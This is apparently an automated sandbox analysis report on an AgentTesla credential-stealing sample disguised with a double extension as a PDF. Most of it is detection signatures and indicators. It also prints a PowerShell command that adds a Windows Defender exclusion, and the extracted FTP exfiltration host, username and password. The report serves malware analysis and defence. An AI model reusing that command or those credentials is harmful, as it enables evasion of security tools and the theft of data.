
Windows Analysis Report
CHARIKLIA JUNIOR DETAILS.pdf.scr.exe

Overview

General Information

Sample name: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
Analysis ID: 1560091
MD5: 56507d8fc1346411ed4fdbecb4589ec8
SHA1: a7d542484247819e9037cbd913b8ad1b68b0dad6
SHA256: ad3517d5640b93e40bc1e839f6616222801d06dd83ed5887462a71f3858f5b40
Tags: exe, user-threatcat_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • CHARIKLIA JUNIOR DETAILS.pdf.scr.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe" MD5: 56507D8FC1346411ED4FDBECB4589EC8)
    • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://beirutrest.com", "Username": "belogs@beirutrest.com", "Password": "9yXQ39wz(uL+"}
Source | Rule | Description | Author | Strings
00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x330d3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x33145:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x331cf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33261:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x332cb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3333d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x333d3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x33463:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x304c6:$s2: GetPrivateProfileString
  • 0x2fbc5:$s3: get_OSFullName
  • 0x31203:$s5: remove_Key
  • 0x31392:$s5: remove_Key
  • 0x32273:$s6: FtpWebRequest
  • 0x330b5:$s7: logins
  • 0x33627:$s7: logins
  • 0x3630a:$s7: logins
  • 0x363ea:$s7: logins
  • 0x37ce6:$s7: logins
  • 0x36f84:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ParentProcessId: 7492, ParentProcessName: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ProcessId: 7668, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ParentProcessId: 7492, ParentProcessName: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ProcessId: 7668, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ParentImage: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ParentProcessId: 7492, ParentProcessName: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe", ProcessId: 7668, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://beirutrest.com", "Username": "belogs@beirutrest.com", "Password": "9yXQ39wz(uL+"}
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Joe Sandbox ML: detected
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Yara match | File source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 50.87.144.157
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: beirutrest.com
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://beirutrest.com
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1423822508.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | String found in binary or memory: http://tempuri.org/ianiDataSet.xsd
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | String found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | String found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49709 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, n00.cs | .Net Code: lGCzgIzdr

                  System Summary

                  barindex
                  Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: initial sampleStatic PE information: Filename: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_0115D51C0_2_0115D51C
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_0583AE790_2_0583AE79
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_05836D510_2_05836D51
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_05836D600_2_05836D60
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_05834E480_2_05834E48
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_058349FC0_2_058349FC
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_058369180_2_05836918
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_058369280_2_05836928
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_058352800_2_05835280
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 0_2_05834A100_2_05834A10
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F2E5B85_2_02F2E5B8
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F24A585_2_02F24A58
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F2A9E05_2_02F2A9E0
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F23E405_2_02F23E40
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F2DD385_2_02F2DD38
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_02F241885_2_02F24188
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DE89705_2_06DE8970
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DEB5F85_2_06DEB5F8
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF65F05_2_06DF65F0
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF7D805_2_06DF7D80
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF55A05_2_06DF55A0
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DFB2485_2_06DFB248
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF23505_2_06DF2350
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DFC1905_2_06DFC190
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF76A05_2_06DF76A0
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF5CF85_2_06DF5CF8
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DFE3A85_2_06DFE3A8
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF00405_2_06DF0040
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF03515_2_06DF0351
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeCode function: 5_2_06DF00075_2_06DF0007
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1427863922.0000000005460000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1423822508.0000000002DCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1429287807.0000000007A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedd vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1428858547.0000000007230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1412520912.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1423822508.0000000002DD5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1398062622.0000000000910000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQkTu.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3858210909.0000000000F99000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeBinary or memory string: OriginalFilenameQkTu.exe4 vs CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, mO0cHCfe6EeD0PN2nv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@2/2
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrbdbnsw.yx3.ps1Jump to behavior
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
